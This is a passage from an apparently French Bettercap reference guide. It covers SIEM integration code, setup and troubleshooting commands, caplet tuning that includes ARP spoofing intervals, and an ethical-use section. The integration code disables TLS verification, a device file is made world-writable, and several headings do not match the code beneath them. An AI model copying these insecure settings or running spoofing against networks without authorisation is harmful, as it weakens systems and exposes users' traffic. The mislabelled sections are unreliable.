'index': splunk_config.get('index', 'security'),
'event': event
\\\\}
try:
response = requests.post(
splunk_config['hec_url'],
headers=\\\\{
'Authorization': f"Splunk \\\\{splunk_config['token']\\\\}",
'Content-Type': 'application/json'
\\\\},
json=splunk_event,
verify=False,
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send to Splunk: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Splunk: \\\\{e\\\\}")
def send_to_elasticsearch(self, events):
"""Send events to Elasticsearch"""
if not self.config.get('elasticsearch', \\\\{\\\\}).get('enabled', False):
return
es_config = self.config['elasticsearch']
for event in events:
index_name = f"bettercap-\\\\{datetime.now().strftime('%Y.%m.%d')\\\\}"
try:
response = requests.post(
f"\\\\{es_config['url']\\\\}/\\\\{index_name\\\\}/_doc",
json=event,
timeout=10
)
if response.status_code not in [200, 201]:
self.logger.error(f"Failed to send to Elasticsearch: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Elasticsearch: \\\\{e\\\\}")
def generate_alerts(self, events):
"""Generate alerts based on event patterns"""
alerts = []
# Group events by type and time
event_groups = \\\\{\\\\}
for event in events:
key = f"\\\\{event['event_type']\\\\}_\\\\{event.get('src_ip', 'unknown')\\\\}"
if key not in event_groups:
event_groups[key] = []
event_groups[key].append(event)
# Check for suspicious patterns
for group_key, group_events in event_groups.items():
if len(group_events) > 10: # High frequency
alerts.append(\\\\{
'alert_type': 'high_frequency_events',
'severity': 'high',
'description': f"High frequency of \\\\{group_events[0]['event_type']\\\\} events",
'event_count': len(group_events),
'time_window': '5 minutes',
'source_ip': group_events[0].get('src_ip'),
'timestamp': datetime.now().isoformat()
\\\\})
# Check for credential harvesting
credential_events = [e for e in events if 'password' in str(e).lower()]
if credential_events:
alerts.append(\\\\{
'alert_type': 'credential_harvesting',
'severity': 'critical',
'description': 'Potential credential harvesting detected',
'event_count': len(credential_events),
'timestamp': datetime.now().isoformat()
\\\\})
return alerts
def process_events(self, events_file):
"""Process Bettercap events and send to SIEM"""
self.logger.info(f"Processing events from \\\\{events_file\\\\}")
events = self.parse_bettercap_events(events_file)
if not events:
self.logger.info("No events to process")
return
self.logger.info(f"Processing \\\\{len(events)\\\\} events")
# Send to configured SIEM systems
self.send_to_splunk(events)
self.send_to_elasticsearch(events)
# Generate and send alerts
alerts = self.generate_alerts(events)
if alerts:
self.logger.info(f"Generated \\\\{len(alerts)\\\\} alerts")
for alert in alerts:
self.send_alert(alert)
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT: \\\\{alert['description']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
# Implementation depends on email configuration
pass
# Configuration
config = \\\\{
'splunk': \\\\{
'enabled': True,
'hec_url': 'https://splunk.company.com:8088/services/collector/event',
'token': 'your-hec-token',
'index': 'security'
\\\\},
'elasticsearch': \\\\{
'enabled': True,
'url': 'http://elasticsearch.company.com:9200'
\\\\},
'email': \\\\{
'enabled': False,
'smtp_server': 'smtp.company.com',
'from': 'security@company.com',
'to': 'soc@company.com'
\\\\}
\\\\}
# Usage
if __name__ == "__main__":
import sys
if len(sys.argv) != 2:
print("Usage: python3 bettercap_siem.py <events_file>")
sys.exit(1)
events_file = sys.argv[1]
integration = BettercapSIEMIntegration(config)
integration.process_events(events_file)
```### Modules JavaScript
Modules JavaScript avancés pour attaques personnalisées :
```bash
# Set proper capabilities
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
# Check capabilities
getcap /usr/local/bin/bettercap
# Run with sudo if capabilities don't work
sudo bettercap
# Check interface permissions
sudo chmod 666 /dev/net/tun
```### Surveillance Réseau
Surveillance et analyse réseau avancées :
```bash
# List available interfaces
ip link show
# Check interface status
ip addr show eth0
# Bring interface up
sudo ip link set eth0 up
# Check for monitor mode (WiFi)
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
```## Scripts d'Automatisation
```bash
# Check available modules
bettercap -help
# Update Bettercap
go install github.com/bettercap/bettercap@latest
# Check Go environment
go env GOPATH
go env GOROOT
# Verify installation
bettercap -version
bettercap -env-infoOptimisation des Performances
Optimisation des performances de Bettercap :
# Increase system limits
echo "* soft nofile 65536" >> /etc/security/limits.conf
echo "* hard nofile 65536" >> /etc/security/limits.conf
# Optimize network buffers
echo 'net.core.rmem_max = 134217728' >> /etc/sysctl.conf
echo 'net.core.wmem_max = 134217728' >> /etc/sysctl.conf
echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf
sysctl -p
# Use performance caplet settings
> set net.probe.throttle 10
> set arp.spoof.interval 1s
> set ticker.period 5Considérations de Sécurité
Utilisation Éthique
Considérations Légales :
- Utilisez Bettercap uniquement sur des réseaux dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test
- Comprendre les lois locales concernant les tests de sécurité réseau
- Obtenir une autorisation appropriée avant de mener des tests de pénétration
- Documenter toutes les activités de test à des fins de conformité
- Respecter la confidentialité et la vie privée des données capturées
Sécurité Opérationnelle :
- Utiliser Bettercap dans des environnements de test isolés si possible
- Mettre en place des contrôles d’accès appropriés pour les données capturées
- Sécuriser le stockage et la transmission d’informations sensibles
- Mises à jour régulières de Bettercap et de ses dépendances
- Surveiller la détection par les systèmes de sécurité réseau
Protection des Données
Sécurité des Données Capturées :
- Chiffrer le trafic et les identifiants capturés
- Implémenter la suppression sécurisée des fichiers temporaires
- Utiliser des canaux sécurisés pour la transmission de données
- Implémenter des politiques de conservation des données
- Évaluations de sécurité régulières de l’infrastructure de test
Références
Site Web Officiel de BettercapDépôt GitHub de Bettercaphttps://owasp.org/www-project-web-security-testing-guide/[Documentation de Bettercap](